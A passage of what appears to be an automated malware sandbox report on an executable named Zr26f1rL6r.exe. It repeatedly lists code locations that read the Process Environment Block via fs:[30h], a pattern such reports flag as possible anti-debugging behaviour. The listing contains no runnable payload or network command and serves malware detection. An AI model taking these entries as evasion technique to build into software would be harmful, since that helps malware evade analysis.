Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]		10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]		10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCD8A mov eax, dword ptr fs:[00000030h]		10_2_1E8BCD8A
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCD8A mov eax, dword ptr fs:[00000030h]		10_2_1E8BCD8A
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C6D91 mov eax, dword ptr fs:[00000030h]		10_2_1E8C6D91
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B6DA6 mov eax, dword ptr fs:[00000030h]		10_2_1E8B6DA6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2DBC mov eax, dword ptr fs:[00000030h]		10_2_1E8F2DBC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2DBC mov ecx, dword ptr fs:[00000030h]		10_2_1E8F2DBC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C7DB6 mov eax, dword ptr fs:[00000030h]		10_2_1E8C7DB6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BDDB0 mov eax, dword ptr fs:[00000030h]		10_2_1E8BDDB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994DA7 mov eax, dword ptr fs:[00000030h]		10_2_1E994DA7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97ADD6 mov eax, dword ptr fs:[00000030h]		10_2_1E97ADD6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97ADD6 mov eax, dword ptr fs:[00000030h]		10_2_1E97ADD6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B8DCD mov eax, dword ptr fs:[00000030h]		10_2_1E8B8DCD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]		10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]		10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]		10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]		10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]		10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]		10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]		10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]		10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]		10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]		10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]		10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]		10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFDE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8EFDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BEDFA mov eax, dword ptr fs:[00000030h]		10_2_1E8BEDFA
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98CDEB mov eax, dword ptr fs:[00000030h]		10_2_1E98CDEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98CDEB mov eax, dword ptr fs:[00000030h]		10_2_1E98CDEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]		10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]		10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]		10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]		10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]		10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]		10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E0D01 mov eax, dword ptr fs:[00000030h]		10_2_1E8E0D01
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94CD00 mov eax, dword ptr fs:[00000030h]		10_2_1E94CD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94CD00 mov eax, dword ptr fs:[00000030h]		10_2_1E94CD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8ECD10 mov eax, dword ptr fs:[00000030h]		10_2_1E8ECD10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8ECD10 mov ecx, dword ptr fs:[00000030h]		10_2_1E8ECD10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97BD08 mov eax, dword ptr fs:[00000030h]		10_2_1E97BD08
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97BD08 mov eax, dword ptr fs:[00000030h]		10_2_1E97BD08
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E958D0A mov eax, dword ptr fs:[00000030h]		10_2_1E958D0A
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BFD20 mov eax, dword ptr fs:[00000030h]		10_2_1E8BFD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov ecx, dword ptr fs:[00000030h]		10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h]		10_2_1E970D24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h]		10_2_1E970D24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h]		10_2_1E970D24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h]		10_2_1E970D24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDD4D mov eax, dword ptr fs:[00000030h]		10_2_1E8DDD4D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDD4D mov eax, dword ptr fs:[00000030h]		10_2_1E8DDD4D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDD4D mov eax, dword ptr fs:[00000030h]		10_2_1E8DDD4D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941D5E mov eax, dword ptr fs:[00000030h]		10_2_1E941D5E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B9D46 mov eax, dword ptr fs:[00000030h]		10_2_1E8B9D46
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B9D46 mov eax, dword ptr fs:[00000030h]		10_2_1E8B9D46
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B9D46 mov ecx, dword ptr fs:[00000030h]		10_2_1E8B9D46
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994D4B mov eax, dword ptr fs:[00000030h]		10_2_1E994D4B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93CD40 mov eax, dword ptr fs:[00000030h]		10_2_1E93CD40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93CD40 mov eax, dword ptr fs:[00000030h]		10_2_1E93CD40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E985D43 mov eax, dword ptr fs:[00000030h]		10_2_1E985D43
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E985D43 mov eax, dword ptr fs:[00000030h]		10_2_1E985D43
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1D50 mov eax, dword ptr fs:[00000030h]		10_2_1E8C1D50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1D50 mov eax, dword ptr fs:[00000030h]		10_2_1E8C1D50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D5D60 mov eax, dword ptr fs:[00000030h]		10_2_1E8D5D60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E966D79 mov esi, dword ptr fs:[00000030h]		10_2_1E966D79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E945D60 mov eax, dword ptr fs:[00000030h]		10_2_1E945D60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E995D65 mov eax, dword ptr fs:[00000030h]		10_2_1E995D65
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBD71 mov eax, dword ptr fs:[00000030h]		10_2_1E8FBD71
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBD71 mov eax, dword ptr fs:[00000030h]		10_2_1E8FBD71
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BBA80 mov eax, dword ptr fs:[00000030h]		10_2_1E8BBA80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E976A80 mov eax, dword ptr fs:[00000030h]		10_2_1E976A80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E967ABE mov eax, dword ptr fs:[00000030h]		10_2_1E967ABE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F9ABF mov eax, dword ptr fs:[00000030h]		10_2_1E8F9ABF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F9ABF mov eax, dword ptr fs:[00000030h]		10_2_1E8F9ABF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F9ABF mov eax, dword ptr fs:[00000030h]		10_2_1E8F9ABF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97DAAF mov eax, dword ptr fs:[00000030h]		10_2_1E97DAAF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0ACE mov eax, dword ptr fs:[00000030h]		10_2_1E8D0ACE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0ACE mov eax, dword ptr fs:[00000030h]		10_2_1E8D0ACE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDAC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8EDAC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0AED mov eax, dword ptr fs:[00000030h]		10_2_1E8C0AED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0AED mov eax, dword ptr fs:[00000030h]		10_2_1E8C0AED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0AED mov eax, dword ptr fs:[00000030h]		10_2_1E8C0AED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E0AEB mov eax, dword ptr fs:[00000030h]		10_2_1E8E0AEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E0AEB mov eax, dword ptr fs:[00000030h]		10_2_1E8E0AEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E0AEB mov eax, dword ptr fs:[00000030h]		10_2_1E8E0AEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BFAEC mov edi, dword ptr fs:[00000030h]		10_2_1E8BFAEC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C9AE4 mov eax, dword ptr fs:[00000030h]		10_2_1E8C9AE4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E940AFF mov eax, dword ptr fs:[00000030h]		10_2_1E940AFF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E940AFF mov eax, dword ptr fs:[00000030h]		10_2_1E940AFF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E940AFF mov eax, dword ptr fs:[00000030h]		10_2_1E940AFF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994AE8 mov eax, dword ptr fs:[00000030h]		10_2_1E994AE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3AF6 mov eax, dword ptr fs:[00000030h]		10_2_1E8D3AF6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FAA0E mov eax, dword ptr fs:[00000030h]		10_2_1E8FAA0E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FAA0E mov eax, dword ptr fs:[00000030h]		10_2_1E8FAA0E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94DA31 mov eax, dword ptr fs:[00000030h]		10_2_1E94DA31
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97DA30 mov eax, dword ptr fs:[00000030h]		10_2_1E97DA30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1A24 mov eax, dword ptr fs:[00000030h]		10_2_1E8C1A24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1A24 mov eax, dword ptr fs:[00000030h]		10_2_1E8C1A24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDA20 mov eax, dword ptr fs:[00000030h]		10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EDA20 mov edx, dword ptr fs:[00000030h]		10_2_1E8EDA20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7A30 mov eax, dword ptr fs:[00000030h]		10_2_1E8B7A30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7A30 mov eax, dword ptr fs:[00000030h]		10_2_1E8B7A30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7A30 mov eax, dword ptr fs:[00000030h]		10_2_1E8B7A30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944A57 mov eax, dword ptr fs:[00000030h]		10_2_1E944A57
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944A57 mov eax, dword ptr fs:[00000030h]		10_2_1E944A57
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F9A48 mov eax, dword ptr fs:[00000030h]		10_2_1E8F9A48
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F9A48 mov eax, dword ptr fs:[00000030h]		10_2_1E8F9A48
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EEA40 mov eax, dword ptr fs:[00000030h]		10_2_1E8EEA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EEA40 mov eax, dword ptr fs:[00000030h]		10_2_1E8EEA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BFA44 mov ecx, dword ptr fs:[00000030h]		10_2_1E8BFA44
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94DA40 mov eax, dword ptr fs:[00000030h]		10_2_1E94DA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E95AA40 mov eax, dword ptr fs:[00000030h]		10_2_1E95AA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E95AA40 mov eax, dword ptr fs:[00000030h]		10_2_1E95AA40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h]		10_2_1E98BA66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h]		10_2_1E98BA66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h]		10_2_1E98BA66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98BA66 mov eax, dword ptr fs:[00000030h]		10_2_1E98BA66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94DB90 mov eax, dword ptr fs:[00000030h]		10_2_1E94DB90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941B93 mov eax, dword ptr fs:[00000030h]		10_2_1E941B93
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1B80 mov eax, dword ptr fs:[00000030h]		10_2_1E8D1B80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F1B9C mov eax, dword ptr fs:[00000030h]		10_2_1E8F1B9C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h]		10_2_1E988BBE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h]		10_2_1E988BBE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h]		10_2_1E988BBE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988BBE mov eax, dword ptr fs:[00000030h]		10_2_1E988BBE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h]		10_2_1E8C3BA4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h]		10_2_1E8C3BA4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h]		10_2_1E8C3BA4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3BA4 mov eax, dword ptr fs:[00000030h]		10_2_1E8C3BA4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E966BDE mov ebx, dword ptr fs:[00000030h]		10_2_1E966BDE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E966BDE mov eax, dword ptr fs:[00000030h]		10_2_1E966BDE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BEBC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8BEBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFBC0 mov ecx, dword ptr fs:[00000030h]		10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFBC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8EFBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBBC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8FBBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBBC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8FBBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBBC0 mov ecx, dword ptr fs:[00000030h]		10_2_1E8FBBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBBC0 mov eax, dword ptr fs:[00000030h]		10_2_1E8FBBC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FBC2 mov eax, dword ptr fs:[00000030h]		10_2_1E93FBC2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h]		10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h]		10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h]		10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944BC0 mov eax, dword ptr fs:[00000030h]		10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E8BD1 mov eax, dword ptr fs:[00000030h]		10_2_1E8E8BD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E8BD1 mov eax, dword ptr fs:[00000030h]		10_2_1E8E8BD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1BE7 mov eax, dword ptr fs:[00000030h]		10_2_1E8D1BE7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1BE7 mov eax, dword ptr fs:[00000030h]		10_2_1E8D1BE7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F5BE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8F5BE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F5BE0 mov eax, dword ptr fs:[00000030h]		10_2_1E8F5BE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994BE0 mov eax, dword ptr fs:[00000030h]		10_2_1E994BE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7BF0 mov eax, dword ptr fs:[00000030h]		10_2_1E8B7BF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7BF0 mov ecx, dword ptr fs:[00000030h]		10_2_1E8B7BF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7BF0 mov eax, dword ptr fs:[00000030h]		10_2_1E8B7BF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7BF0 mov eax, dword ptr fs:[00000030h]		10_2_1E8B7BF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94DB1B mov eax, dword ptr fs:[00000030h]		10_2_1E94DB1B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EEB1C mov eax, dword ptr fs:[00000030h]		10_2_1E8EEB1C
